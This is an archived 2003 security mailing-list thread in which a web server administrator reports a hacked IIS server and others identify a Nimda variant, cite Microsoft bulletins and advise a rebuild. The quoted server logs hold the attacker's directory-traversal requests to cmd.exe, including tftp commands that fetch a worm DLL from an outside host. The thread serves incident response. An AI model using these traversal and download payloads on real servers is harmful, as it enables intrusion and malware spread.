Rogelio, on Nimda.E from Symantec: This worm is similar in functionality to W32.Nimda.A@mm. Differences include the modification of file names used by the worm. The attachment received has been changed to: Sample.exe The dropped .dll file is now: Httpodbc.dll The worm now copies itself to the \%Windows% folder as Csrss.exe instead of Mmc.exe Try looking for c:\winnt\csrss.exe for the virus. Also, this isn't where the ncx99.exe came from. I'd do a thorough search for any usage of cmd.exe/root.exe in your web logs and start there, after taking it offline. hth, sunzi ----- Original Message ----- From: "Michael Katz" <mikeat_private> To: <incidentsat_private> Cc: "Rogelio Vidaurri Courcelle" <rvidaurriat_private> Sent: Sunday, January 12, 2003 9:20 PM Subject: Re: Hacked web server > At 1/10/2003 12:39 PM, Rogelio Vidaurri Courcelle wrote: > > >Hi... my web server (NT 4.0 SP6a) was hacked last friday > > Rogelio, > > >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, > >125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, > >/c+dir, > > The above shows that your server is susceptible to a vulnerability detailed > in Microsoft Security Bulletin MS00-057 > (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp). This > vulnerability is NOT fixed by Service Pack 6a. You need to install > additional patches for IIS. When you rebuild the server, you should > install the cumulative IIS patch described in Microsoft Security Bulletin > MS02-062 (http://www.microsoft.com/technet/security/bulletin/ms02-062.asp) > > >200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, > >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, > >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll, > >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, > >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, > >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll, > >200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, > >125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, > >/c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll, > > Your failure to find a virus (httpodbc.dll) on your hard disk may indicate > that your firewall was configured properly or that antivirus software > prevented the infected file from being written to your hard disk (if you > had antivirus software with relatively current definitions). However, > there are plenty of other bad things that could be on your system that > attackers could have placed on your system that would not be flagged as > malware by antivirus software. > > >i have read that it could be because of Nimda but i have scanned with > >the latest pattern and it found no viruses... only a backdoor trojan > >called ncx99.exe dropped in mailroot\drop\temp > >by the way, can i delete files inside that folder??? there's a > >rundlls32.exe... a KEY file, etcetera...... > > ncx99.exe is most likely a modified version of netcat and is not flagged by > most antivirus software as malware. > > If your machine has been configured this way for two months, you should > rebuild it and start from scratch. Who knows what attackers may have done > to your system? > > > Michael Katz > mikeat_private > Procinct Security > > > -------------------------------------------------------------------------- -- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jan 14 2003 - 16:10:02 PST